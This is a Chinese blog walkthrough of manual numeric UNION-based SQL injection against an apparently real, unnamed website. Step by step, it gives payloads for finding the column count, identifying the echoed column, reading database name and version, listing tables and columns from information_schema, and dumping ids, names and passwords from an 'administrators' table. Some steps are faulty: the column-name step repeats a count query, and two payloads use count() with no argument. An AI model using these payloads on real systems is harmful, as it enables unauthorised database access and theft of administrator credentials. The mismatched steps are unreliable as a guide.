记手工SQL数字回显型注入

  • A+
所属分类:安全文章

前言

已经检测出该网站有sql注入问题,试着手工注入网站,顺便再复习一下。


01

正文


1.先通过引号 判断该网站为数字型,payload直接拼接,无需引号闭合,当网站后直接构造拼接 and 0# 网站文章列表内容受到影响显示空白,此为回显类型注入


记手工SQL数字回显型注入


payload:and 0#


2.进行字段数的猜解,确定回显位


字段数猜解通过payload:ORDER BY X # 对X字段进行回显字段值猜解,此网站X=6时,网站显示正常则确定回显字段数为6


构造payload:UNION SELECT 1,2,3,4,5,6# 确定回显位为2,6选择其一即可


记手工SQL数字回显型注入


确定回显位:payload:UNION SELECT 1,2,3,4,5,6#


3.进网站进行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 对第二位字段进行函数替换可收集网站数据库相关信息如:version() 数据库版本信息 @@basedirmysql安装路径等


记手工SQL数字回显型注入


4.获取表数量,通过上一步得到mysql数据库版本大于5.1,可以通过MySQL的information_schema数据库进行数据获取


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #


5.获取表名


记手工SQL数字回显型注入


payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #


6.获取数据库表字段数


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #


7.获取数据库表字段名


记手工SQL数字回显型注入


payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #


8.获取表数据


记手工SQL数字回显型注入


payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 #


说明

以mysql数据库,数字回显类型进行sql手工注入流程,仅供参考


记手工SQL数字回显型注入

【火线短视频精选】


【周度激励】2021.8.2 ~ 2021.8.8公告


记手工SQL数字回显型注入



【相关精选文章】


vip业务权限漏洞挖掘入门姿势实战


洞态IAST Python探针内测版发布


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火线小助手]加入。


我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!


欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!

记手工SQL数字回显型注入

记手工SQL数字回显型注入

本文始发于微信公众号(火线Zone):记手工SQL数字回显型注入

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: